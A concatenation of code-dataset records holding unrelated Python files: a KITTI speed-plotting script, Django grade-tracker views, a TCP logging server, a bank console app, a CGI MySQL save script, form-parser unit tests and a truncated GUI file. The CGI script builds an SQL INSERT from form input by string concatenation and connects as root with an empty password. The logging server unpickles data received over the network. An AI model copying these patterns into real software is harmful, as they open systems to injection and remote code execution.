10\n\nx_res = 610\ny_res = 370\n\ndef le_velocidade_oxts(path_to_sync_folder):\n\n oxts_dir = os.path.join(path_to_sync_folder, OXTS_DIR)\n \n list_files = glob.glob(os.path.join(oxts_dir, '*'))\n list_files.sort()\n velocities = []\n for fname in list_files:\n \n with open(os.path.join(oxts_dir, fname), 'r') as oxts_file:\n oxts_values = oxts_file.read().split()\n\n vn = float(oxts_values[IDX_VN])\n ve = float(oxts_values[IDX_VE])\n vf = float(oxts_values[IDX_VF])\n vl = float(oxts_values[IDX_VL])\n vu = float(oxts_values[IDX_VU])\n speed = sqrt(vn**2+ve**2)\n #num = int(os.path.splitext(basename0)[0])\n\n velocities.append(speed)\n\n return velocities\n\ndef le_imagens(path_to_sync_folder):\n\n images_dir = os.path.join(path_to_sync_folder, IMAGE_DIR)\n \n list_files = glob.glob(os.path.join(images_dir, '*'))\n list_files.sort()\n images_fullpath = []\n for fname in list_files:\n images_fullpath.append(fname)\n \n\n return images_fullpath\n\ndef grafico_kitti(model, device, path_to_sync_folder):\n\n model.eval()\n \n v_list = le_velocidade_oxts(path_to_sync_folder)\n images_list = le_imagens(path_to_sync_folder)\n\n transforms = torchvision.transforms.Compose([\n torchvision.transforms.CenterCrop((y_res, x_res)),\n torchvision.transforms.ToTensor() \n ])\n pred = []\n for i in range(len(images_list)-1):\n img0 = PIL.Image.open(images_list[i])\n img1 = PIL.Image.open(images_list[i+1])\n img0_tensor = transforms(img0).to(device, torch.float)\n img1_tensor = transforms(img1).to(device, torch.float)\n imgs = torch.cat((img0_tensor, img1_tensor), dim=0)\n pred_vel = model(imgs[None, :]).item()\n pred.append(pred_vel)\n \n window_size = 10 \n pred = np.array(pred).reshape(-1, 1)\n pred = np.array(ma.moving_average(pred.flatten(), window_size, [1,2,3,5,5,5,7,7,7,10]))\n v_list = np.array(v_list)[:-1]\n pred = np.pad(pred, pad_width=(0, window_size-1), mode='edge')\n error = pred - v_list\n plt.plot(pred, label='predicted')\n plt.plot(v_list, label='ground truth')\n #plt.plot(error, label='error')\n plt.xlabel('frame')\n plt.ylabel('speed (m/s)')\n plt.legend()\n plt.title('Trip 2011_09_26 0070 (with moving average)')\n\n\n mae = np.mean(np.abs(pred.flatten() - v_list.flatten()))\n plt.text(100, 5, 'Mean Absolute Error {} m/s'.format(\"{0:.4f}\".format(mae)))\n plt.show()\n\n \n print(\"MAE \", mae)\n \n\n\n\ndef main():\n\n sync_folder = '/mnt/kitti/dataset/test/2011_09_26/2011_09_26_drive_0070_sync'\n device = torch.device('cuda')\n model = MyFlownetS(device, batchNorm=True).to(device)\n model.load_state_dict(torch.load('models/model_9.pth')['state_dict']) \n\n grafico_kitti(model, device, sync_folder)\n\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"grafico_viagem.py","file_name":"grafico_viagem.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469590094","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\n\nfrom gradetracker.models import *\nfrom gradetracker.forms import *\n\n### Non-view helper functions ###\ndef is_teacher(user):\n \"\"\" Returns True if passed user is a Teacher and false otherwise.\"\"\"\n return user.get_profile().user_type == 'T'\n \ndef in_course(user, course_id):\n \"\"\"\n Returns True if passed user is either teaching or studying course\n with passed course_id, and False otherwise.\n \"\"\"\n course = Course.objects.get(id=course_id)\n if is_teacher(user):\n return course in user.courses_teaching.all()\n else:\n return course in user.courses_studying.all()\n \n### End of non-view helper functions ###\n\n\ndef home(request):\n \"\"\"\n Grade tracker application home page.\n \"\"\"\n return render_to_response('gradetracker/home.html',\n RequestContext(request))\n \n@login_required\ndef courses_index(request):\n user = request.user\n \n if is_teacher(user):\n courses_list = user.courses_teaching.all().order_by('-year', '-semester')\n else:\n courses_list = user.courses_studying.all().order_by('-year', '-semester')\n \n return render_to_response('gradetracker/courses_index.html', \\\n RequestContext(request,\n {'courses_list':courses_list,\n 'is_teacher':is_teacher(user)}))\n\n@login_required\ndef coursedetail(request, course_id):\n course = get_object_or_404(Course, pk=course_id) # pk is primary key\n if in_course(request.user, course_id):\n return render_to_response('gradetracker/coursedetail.html',\n RequestContext(request,\n {'course':course,\n 'is_teacher':is_teacher(request.user)}))\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\n@login_required\ndef assignmentdetail(request, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n grades_dict = {}\n \n if in_course(user, course_id):\n if is_teacher(request.user):\n for student in course.students.all():\n try:\n grades_dict[student.id] = assignment.grade_set.get(student__id=student.id)\n except Grade.DoesNotExist:\n grades_dict[student.id] = Grade(assignment=assignment,\n student=student,\n grade=\"Not Available\")\n \n else:\n try:\n grades_dict[user.id] = assignment.grade_set.get(student__id=user.id)\n except Grade.DoesNotExist:\n grades_dict[user.id] = Grade(assignment=assignment,\n student=user,\n grade=\"Not Available\")\n \n return render_to_response('gradetracker/assignmentdetail.html', \\\n RequestContext(request,\n {'course':course,\n 'assignment':assignment,\n 'grades_dict':grades_dict,\n 'is_teacher':is_teacher(user)}))\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request)) \n\n@login_required\ndef gradesdetail(request, user_id, course_id):\n student = get_object_or_404(User, pk=user_id)\n course = get_object_or_404(Course, pk=course_id)\n grades_dict = {}\n \n try:\n course_grade = course.coursegrade_set.get(student__id=user_id).course_grade\n except CourseGrade.DoesNotExist:\n course_grade = \"Not Available\"\n \n if (int(request.user.id) == int(user_id)) or \\\n (request.user in course.teachers.all()):\n for assignment in course.assignment_set.all():\n try:\n grades_dict[assignment.id] = assignment.grade_set.get(student__id=user_id)\n except Grade.DoesNotExist:\n grades_dict[assignment.id] = Grade(assignment=assignment,\n student=student,\n grade='Not Available')\n \n return render_to_response('gradetracker/gradedetail.html', \\\n RequestContext(request,\n {'student':student,\n 'course':course,\n 'grades_dict':grades_dict,\n 'course_grade':course_grade,\n 'is_teacher':is_teacher(request.user)}))\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/oneroom/gradetracker/')\n \ndef register_page(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n \n # save new user if registration data is valid\n if form.is_valid():\n user = User(username=form.cleaned_data['username'],\n first_name=form.cleaned_data['first_name'],\n last_name=form.cleaned_data['last_name'],\n email=form.cleaned_data['email'])\n user.save()\n user.set_password(form.cleaned_data['password1'])\n # user profile stores additional info about user_type(Teacher or Student)\n profile = UserProfile(user_type=form.cleaned_data['user_type'],\n user=user)\n profile.save()\n user.save()\n \n # log in new user and redirect to success page\n user = authenticate(username=form.cleaned_data['username'],\n password=form.cleaned_data['password1'])\n login(request, user)\n # Redirect to a success page\n return HttpResponseRedirect('/oneroom/accounts/regsuccess/')\n \n else:\n form = RegistrationForm()\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('registration/register.html', variables)\n \n@login_required\ndef password_change_page(request):\n if request.method == 'POST':\n form = PasswordChangeForm(request.user, request.POST)\n \n if form.is_valid():\n request.user.set_password(form.cleaned_data['new_password1'])\n request.user.save()\n return HttpResponseRedirect('/oneroom/accounts/updatesuccess/')\n else:\n form = PasswordChangeForm(request.user)\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('registration/password.html', variables)\n \n@login_required\ndef email_change_page(request):\n if request.method == 'POST':\n form = EmailChangeForm(request.POST)\n if form.is_valid():\n request.user.email = form.cleaned_data['email']\n request.user.save()\n return HttpResponseRedirect('/oneroom/accounts/updatesuccess/')\n else:\n form = EmailChangeForm(initial={'email':request.user.email})\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('registration/email.html', variables)\n \n@login_required\ndef courses_add(request):\n user = request.user\n if is_teacher(user):\n if request.method == 'POST':\n form = CourseAddForm(request.POST)\n if form.is_valid():\n course = Course(name=form.cleaned_data['name'],\n year=form.cleaned_data['year'],\n semester=form.cleaned_data['semester'],\n passcode=form.cleaned_data['passcode2'])\n course.save()\n course.teachers.add(user)\n course.save()\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_create_success.html', variables)\n else:\n form = CourseAddForm()\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('gradetracker/courses_add.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\n@login_required\ndef course_edit(request, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n if user in course.teachers.all():\n if request.method == 'POST':\n form = CourseAddForm(request.POST)\n if form.is_valid():\n course.name = form.cleaned_data['name']\n course.year = form.cleaned_data['year']\n course.semester = form.cleaned_data['semester']\n course.save()\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_edit_success.html', variables)\n else:\n form = CourseAddForm(initial={'name':course.name,\n 'year':course.year,\n 'semester':course.semester})\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('gradetracker/course_edit.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_delete(request, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n if user in course.teachers.all():\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_delete_confirm.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_delete_confirmed(request, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n if user in course.teachers.all():\n course.delete()\n return HttpResponseRedirect('/oneroom/gradetracker/course/delete/success/')\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_remove_user(request, course_id, user_id):\n \"\"\"Removes user from course\"\"\"\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n user_tobe_removed = get_object_or_404(User, pk=user_id)\n \n if (int(user.id) == int(user_id)) or \\\n (user in course.teachers.all() and user_tobe_removed in course.students.all()):\n # user can always remove self; teachers can remove students in the course\n variables = RequestContext(request, {'course':course,\n 'user_tobe_removed':user_tobe_removed})\n return render_to_response('gradetracker/course_remove_user_confirm.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_remove_user_confirmed(request, course_id, user_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n user_tobe_removed = get_object_or_404(User, pk=user_id)\n \n if (int(user.id) == int(user_id)) or \\\n (user in course.teachers.all() and user_tobe_removed in course.students.all()):\n if is_teacher(user_tobe_removed):\n course.teachers.remove(user_tobe_removed)\n else:\n course.students.remove(user_tobe_removed)\n course.save()\n \n variables = RequestContext(request, {'course':course,\n 'user_tobe_removed':user_tobe_removed,\n 'is_teacher':is_teacher(user_tobe_removed)})\n return render_to_response('gradetracker/course_remove_user_success.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef courses_all(request):\n \"\"\" displays all courses, including ones that the user is not part off \"\"\"\n courses_list = Course.objects.all().order_by('name', '-year')\n \n return render_to_response('gradetracker/all_courses.html', \\\n RequestContext(request,\n {'courses_list':courses_list,\n 'is_teacher':is_teacher(request.user)}))\n \n@login_required\ndef course_add_user(request, course_id, user_id):\n \"\"\"Adds user to course\"\"\"\n course = get_object_or_404(Course, pk=course_id)\n \n variables = RequestContext(request, {'course':course,\n 'is_teacher':is_teacher(request.user)})\n return render_to_response('gradetracker/course_add_user_confirm.html', variables)\n \n@login_required\ndef course_add_user_confirmed(request, course_id, user_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n\n if is_teacher(user):\n redirect_url = '/oneroom/gradetracker/course' + course_id + '/user' + user_id + '/add_teacher/'\n return HttpResponseRedirect(redirect_url)\n else:\n course.students.add(user)\n course.save() \n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_add_user_success.html', variables)\n\n@login_required\ndef course_add_teacher(request, course_id, user_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n \n if is_teacher(user):\n if request.method == 'POST':\n form = CoursePasscodeForm(request.POST)\n if form.is_valid():\n passcode = form.cleaned_data['passcode']\n if passcode == course.passcode:\n course.teachers.add(user)\n course.save()\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_add_user_success.html', variables)\n else:\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_add_teacher_bad_passcode.html', variables)\n else:\n form = CoursePasscodeForm()\n \n variables = RequestContext(request, {'form':form,\n 'course':course})\n return render_to_response('gradetracker/course_add_teacher_passcode.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef assignment_add(request, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n \n if user in course.teachers.all():\n if request.method == 'POST':\n form = AssignmentAddForm(request.POST)\n if form.is_valid():\n assignment = Assignment(name=form.cleaned_data['name'],\n due_date=form.cleaned_data['due_date'])\n assignment.course = course\n assignment.save()\n \n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/assignment_add_success.html', variables)\n else:\n form = AssignmentAddForm()\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('gradetracker/assignments_add.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef assignment_edit(request, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n \n if user in course.teachers.all():\n if request.method == 'POST':\n form = AssignmentAddForm(request.POST)\n if form.is_valid():\n assignment.name = form.cleaned_data['name']\n assignment.due_date = form.cleaned_data['due_date']\n assignment.save()\n \n variables = RequestContext(request, {'course':course,\n 'assignment':assignment})\n return render_to_response('gradetracker/assignment_edit_success.html', variables)\n else:\n form = AssignmentAddForm(initial={'name':assignment.name,\n 'due_date':assignment.due_date})\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('gradetracker/assignment_edit.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\n@login_required\ndef assignment_delete(request, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n \n if user in course.teachers.all():\n variables = RequestContext(request, {'course':course,\n 'assignment':assignment})\n return render_to_response('gradetracker/assignment_delete_confirm.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef assignment_delete_confirmed(request, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n \n if user in course.teachers.all():\n assignment.delete()\n variables = RequestContext(request, {'course':course,\n 'assignment':assignment})\n return render_to_response('gradetracker/assignment_delete_success.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef grade_edit(request, student_id, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n student = get_object_or_404(User, pk=student_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n \n try:\n grade = assignment.grade_set.get(student__id=student_id)\n except Grade.DoesNotExist:\n grade = Grade(assignment=assignment,\n student=student,\n grade=\"\")\n \n if user in course.teachers.all():\n if request.method == 'POST':\n form = GradeEditForm(request.POST)\n if form.is_valid():\n grade.grade = form.cleaned_data['grade']\n grade.save()\n \n variables = RequestContext(request, {'course':course,\n 'student':student,\n 'assignment':assignment})\n return render_to_response('gradetracker/grade_edit_success.html', variables)\n else:\n form = GradeEditForm(initial={'grade':grade.grade})\n \n variables = RequestContext(request, {'form':form,\n 'course':course,\n 'student':student,\n 'assignment':assignment})\n return render_to_response('gradetracker/grade_edit.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_grade_edit(request, student_id, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n student = get_object_or_404(User, pk=student_id)\n \n try:\n course_grade = course.coursegrade_set.get(student__id=student_id)\n except CourseGrade.DoesNotExist:\n course_grade = CourseGrade(course=course,\n student=student,\n course_grade=\"\")\n \n if user in course.teachers.all():\n if request.method == 'POST':\n form = GradeEditForm(request.POST)\n if form.is_valid():\n course_grade.course_grade = form.cleaned_data['grade']\n course_grade.save()\n \n variables = RequestContext(request, {'course':course,\n 'student':student})\n return render_to_response('gradetracker/coursegrade_edit_success.html', variables)\n else:\n form = GradeEditForm(initial={'grade':course_grade.course_grade})\n \n variables = RequestContext(request, {'form':form,\n 'course':course,\n 'student':student})\n return render_to_response('gradetracker/coursegrade_edit.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\n@login_required\ndef search_page(request):\n form = SearchForm()\n courses_list = []\n show_results = False\n query = \"\"\n \n if 'query' in request.GET:\n show_results = True\n query = request.GET['query'].strip()\n if query:\n form = SearchForm({'query' : query})\n courses_list = Course.objects.filter(name__icontains=query)\n \n variables = RequestContext(request,\n {'form':form,\n 'courses_list':courses_list,\n 'show_results':show_results,\n 'is_teacher':is_teacher(request.user),\n 'query':query})\n if request.GET.has_key('ajax'):\n return render_to_response('gradetracker/courses_list.html', variables)\n else:\n return render_to_response('gradetracker/search.html', variables)","sub_path":"gradetracker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179528250","text":"import sys\nimport pickle\nimport struct\nimport logging\nimport logging.handlers\nimport socketserver\n\nSERVER_SHUTDOWN_MESSAGE = 'LOG_SERVER_SHUTDOWN_REQUEST'\n\n\nclass LogRecordStreamHandler(socketserver.StreamRequestHandler):\n '''\n Handler for a streaming logging request.\n '''\n\n def handle(self):\n '''\n Waits for packets to be sent via the oppen socket connection\n and logs them once they have been received\n '''\n while True:\n chunk = self.connection.recv(4)\n if len(chunk) < 4:\n break\n slen = struct.unpack('>L', chunk)[0] # '>L' format stands for big-endian (>) unsigned long (L)\n chunk = self.connection.recv(slen)\n while len(chunk) < slen:\n chunk = chunk + self.connection.recv(slen - len(chunk))\n obj = pickle.loads(chunk)\n record = logging.makeLogRecord(obj)\n if record.getMessage() == SERVER_SHUTDOWN_MESSAGE:\n self.server.shutdown()\n self.handleRecord(record)\n\n def handleRecord(self, record):\n '''\n Logs the :param: record according the logging handlers specified upon initialization\n :param record: LogRecord received from open socket from a distant logger\n '''\n self.server.logger.handle(record)\n\n\nclass LogRecordSocketReceiver(socketserver.ThreadingTCPServer):\n '''\n TCP Server which serves until shutdown message arrives\n from queue.\n '''\n\n def __init__(self, host='localhost',\n port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,\n handler=LogRecordStreamHandler,\n log_path=None, Queue=None):\n socketserver.ThreadingTCPServer.__init__(self, (host, port), handler)\n self.shutdown_is_requested = False\n self.timeout = 1\n self.logger = self.initialize_root_log_server_socket(log_path)\n\n def initialize_root_log_server_socket(self, log_path):\n '''\n IMPORTANT: the logger MUST be the root logger, otherwise\n the handlers attached to it will be ignored\n\n Initializes root logger to print to standard output\n and to a log file located in :param: log_path\n :param log_path: Path where log file will be saved\n '''\n logger = logging.getLogger('ServerLogger')\n console_handler = logging.StreamHandler(stream=sys.stdout)\n file_handler = logging.FileHandler(filename=log_path)\n log_format = logging.Formatter(fmt='[%(asctime)s]:%(levelname)s:%(name)s: %(message)s', datefmt='%m-%d %H:%M:%S')\n\n console_handler.setFormatter(log_format)\n file_handler.setFormatter(log_format)\n\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)\n return logger\n\n def shutdown(self):\n self.shutdown_is_requested = True\n\n def serve_until_stopped(self):\n import select\n while not self.shutdown_is_requested:\n rd, wr, ex = select.select([self.socket.fileno()],\n [], [],\n self.timeout)\n if rd:\n self.handle_request()\n self.logger.warning('Server shutting down, no further logs will be saved')\n\n\ndef serve_logging_server_forever(log_path):\n '''\n Starts a TCPServer that spawns a new thread for each connection\n (analogous to creating a new connection per logger).\n TODO: figure out a way of shutting the server down upon completion :param log_path: Path where log file will be saved\n '''\n tcpserver = LogRecordSocketReceiver(host='localhost',\n port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,\n handler=LogRecordStreamHandler,\n log_path=log_path)\n tcpserver.serve_until_stopped()\n\n\nif __name__ == '__main__':\n serve_logging_server_forever('logs')\n","sub_path":"regym/logging_server/log_server_socket.py","file_name":"log_server_socket.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302826833","text":"from bank import bankAccount\n\n#Create bank account object\nbank = bankAccount('bank.json')\n\n#Login to account\nprint(\"Please login to access your account.\")\nbank.login()\n\n#List of options\noptions = (\"View Balance\", \"Withdraw\", \"Deposit\", \"Exit\")\nlenOptions = len(options)\n\ndef bankOptions():\n #Shows options\n for index in range(0, lenOptions):\n print(str(index + 1) + \": \" + options[index])\n\n try:\n #Prompts user\n choice = 0\n while choice not in (1,2,3,4):\n choice = int(input(\"Please select an option from the list above: \"))\n\n if choice == 1:\n bank.getBalance()\n elif choice == 2:\n amount = int(input(\"Please enter the amount you'd like to withdraw: \"))\n bank.withdraw(amount)\n bank.getBalance()\n elif choice == 3:\n amount = int(input(\"Please enter the amount you'd like to deposit: \"))\n bank.deposit(amount)\n bank.getBalance()\n elif choice == 4:\n print(\"Thank you for banking with Bouchard Credit Union, have a nice day!\")\n exit()\n\n\n #Prompts user\n again = 0\n while again not in (1,2):\n again = int(input(\"Would you like to continue using the app? Press 1 to continue and 2 to quit: \"))\n if again == 1:\n bankOptions()\n elif again == 2:\n print(\"Thank you for banking with Bouchard Credit Union, have a nice day!\")\n exit()\n #Accounts for non int-type inputs to both prompts\n except ValueError:\n print(\"You have entered an invalid option. Please try again!\")\n bankOptions()\n\nbankOptions()\n","sub_path":"bankApp/bankApp.py","file_name":"bankApp.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"631890662","text":"#!/usr/bin/python3\n\"\"\"\nSave topic title and solution to MySQL database and shelve file 'topics'\n\nweb server calls line 1 to load and run this module.\n\"\"\"\n\nfrom __future__ import print_function;\nfrom __future__ import division;\nfrom __future__ import unicode_literals;#not work with Python2.7 shelve module?\nfrom __future__ import absolute_import;\n\nimport sys;\nimport pymysql;\nimport cgi, cgitb; cgitb.enable();\n\nimport utility;#custom module\n\nmajor = sys.version_info.major; # 2 or 3\nminor = sys.version_info.minor; # 7 or 4\n\n'''\nmysql> describe howto.topics;\n+----------+----------+------+-----+---------+----------------+\n| Field | Type | Null | Key | Default | Extra |\n+----------+----------+------+-----+---------+----------------+\n| id | int(11) | NO | PRI | NULL | auto_increment |\n| title | text | YES | | NULL | |\n| solution | longtext | YES | | NULL | |\n+----------+----------+------+-----+---------+----------------+\n3 rows in set (0.01 sec)\n\nCAUTION:\nPython2.7 shelve key may need to be non-unicode string so do myShelve[str(key)].\n'''\n\n\n\ncolumns = [];#list of column values for database input, ie ['\"user\"', '\"pwd\"']\ncontent = [];\n\n#returned class ->\n#\tFieldStorage(None,None,[MiniFieldStorage('topic_title','hi'),\n#\tMiniFieldStorage('topic_solution','home sweet home')])\nrequest = cgi.FieldStorage();\n\nkey_topic_textbox_name = 'topic_title';\nkey_solution_textarea_name = 'topic_solution';\n\ntry:#make connection\n\tconn = pymysql.connect(host='localhost', user='root', password='',\\\n\t\tdatabase='vad');\n\tcursor = conn.cursor();# get cursor to perform action\n\n\t#data from client is for one row (at a time) in database\n\t#request[key] -> MiniFieldStorage('topic_title','hi'); read via name, value\n\t#textbox HTML element contains 'topic_title'; represents a name-value pair\n\t#textarea HTML element contains 'topic_solution'; represents a name-value pair\n\t#for key in request:#effectively, for each data entry HTML element with name-value\n\t\t#works for single or multiple values, ie as single value or list of values\n\t\t#characters < > \" are replaced with HTML entities\n\t\t#columns.append('\"' + utility.escape(request.getlist(key)[0]) + '\"');\n\t\n\t#characters < > \" are replaced with HTML entities\n\tif (key_topic_textbox_name in request) and \\\n\t(key_solution_textarea_name in request):\n\t\t#get and escape topic_title value\n\t\ttopic_title = utility.escape(request.getlist(key_topic_textbox_name)[0]);\n\t\t#get and escape topic_solution value\n\t\ttopic_solution = utility.escape(\\\n\t\t\trequest.getlist(key_solution_textarea_name)[0]);\n\t\t#store topic_title,topic_solution as key,value pair in shelve file\t\n\t\tutility.write_to_shelve_file(topic_title, topic_solution);\n\t\t#setup text to be used in sql insert syntax, \n\t\t#\tie in insert...values(\"topic_title\",\"topic_solution\");\n\t\tcolumns.append('\"' + topic_title + '\"');\n\t\tcolumns.append('\"' + topic_solution + '\"');\n\t#compose sql insert syntax\n\tcontent = '(' + ','.join(columns) + ')';\n\tcontent = 'insert into howto.topics (title,solution) values ' + content + ';';\n\t\n\t#cursor.execute('select * from vad.contacts;');#returns number of rows found\n\tcursor.execute(content); # returns number of rows affected\n\tconn.commit();#ensure changes made in actual database\n\tcursor.close();\n\tconn.close();#clean up\nexcept Exception as err:\n\t(excType, excDetail, traceback) = sys.exc_info();\n\tcontent = 'ExceptionType: {:}\\nExceptionDetail: {:}\\n'\\\n\t\t.format(excType, excDetail);\n\tcontent = err.__str__();\t\n\tif conn:\n\t\tconn.close();\n\n#store_key_value(str(cgi.escape(content)), 'sql execute query');#ok\n\nprint('Content-Type: text/plain; charset=utf-8\\n\\n');\n\n#print(request.getlist('topic_title'));\n#print( request['topic_title'] );\nprint(content);\nprint(utility.escape( content) );\nprint(request);\n\n\n\n","sub_path":"mycode/howto/cgi-bin/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148278316","text":"import unittest\r\n\r\nfrom python.src.FormChop import form_json_to_dict\r\nfrom python.src.FormChop import form_dict_cleanup\r\n\r\nfrom python.test.static.monitor_output_sample_output import sample_output\r\n\r\nclass TestFormChopJsonToDict(unittest.TestCase):\r\n def test_form_json_to_dict_output_fake_file(self):\r\n \"\"\" A fake file should raise an exception \"\"\"\r\n test_file = 'static/fake_file.json'\r\n\r\n with self.assertRaises(ValueError):\r\n test_output = form_json_to_dict(test_file)\r\n\r\n def test_form_json_to_dict_output_real_file_not_empty(self):\r\n \"\"\" A real file should return a non-empty dict \"\"\"\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n self.assertNotEqual(test_output, {})\r\n\r\n def test_form_json_to_dict_output_real_file_monitor_name_key(self):\r\n \"\"\" All non-null entries should have the monitor_name key\"\"\"\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n failures = []\r\n for i in test_output:\r\n if i is not None:\r\n if 'monitor_name' not in i.keys():\r\n failures.append(i)\r\n\r\n self.assertEqual(failures, [])\r\n\r\n def test_form_json_to_dict_output_real_file_all_plan_keys(self):\r\n \"\"\" If the monitor maps two plans, they should include the SrvPlan and \r\n WkstPlan keys\r\n \r\n \"\"\"\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n failures = []\r\n for i in test_output:\r\n if i is not None:\r\n if len(i.keys()) == 3 and ('SrvPlan' and 'WkstPlan' not in i.keys()):\r\n failures.append(i)\r\n\r\n self.assertEqual(failures, [])\r\n\r\n def test_form_json_to_dict_output_real_file_single_plan_keys(self):\r\n \"\"\" If a monitor maps a single plan, it should contain one of the plans\r\n listed in plan_list.\r\n \r\n \"\"\"\r\n plan_list = ['WkstPlan', 'SrvPlan', 'GlbPlan']\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n failures = []\r\n for i in test_output:\r\n if i is not None:\r\n if len(i.keys()) == 2 and len(set(i.keys()) - set(plan_list)) != 1:\r\n failures.append(i)\r\n\r\n self.assertEqual(failures, [])\r\n\r\n def test_form_json_to_dict_output_real_file_no_plan_keys(self):\r\n \"\"\" If a monitor maps no service plans, the only key should be\r\n 'monitor_name'\r\n \r\n \"\"\"\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n failures = []\r\n for i in test_output:\r\n if i is not None:\r\n if len(i.keys()) == 1 and i.keys()[0] != 'monitor_name':\r\n failures.append(i)\r\n\r\n self.assertEqual(failures, [])\r\n\r\nclass TestFormChopFormDictCleanup(unittest.TestCase):\r\n def test_form_dict_cleanup_output_fake_list(self):\r\n \"\"\" The function should return an empty dict if given an empty list \"\"\"\r\n test_input = []\r\n test_output = form_dict_cleanup(test_input)\r\n\r\n self.assertEqual(test_output, {})\r\n\r\n def test_form_dict_cleanup_output_sample_output(self):\r\n \"\"\" The function should return the appropriate monitors \"\"\"\r\n test_input = sample_output\r\n clean_input = [i for i in test_input if i is not None]\r\n test_input_monitors = [monitor['monitor_name']\r\n for monitor in clean_input if 'monitor_name' in monitor]\r\n\r\n test_output = form_dict_cleanup(test_input)\r\n output_keys = test_output.keys()\r\n\r\n self.assertEqual(set(test_output), set(output_keys))\r\n","sub_path":"python/test/test_formchop_output.py","file_name":"test_formchop_output.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348710546","text":" \nfrom tkinter import *\nfrom tkinter import filedialog\nfrom threading import Thread\nfrom encoder import EncoderDecoder\n\nclass GUI:\n\n def __init__(self, root): \n\n self.encoder = 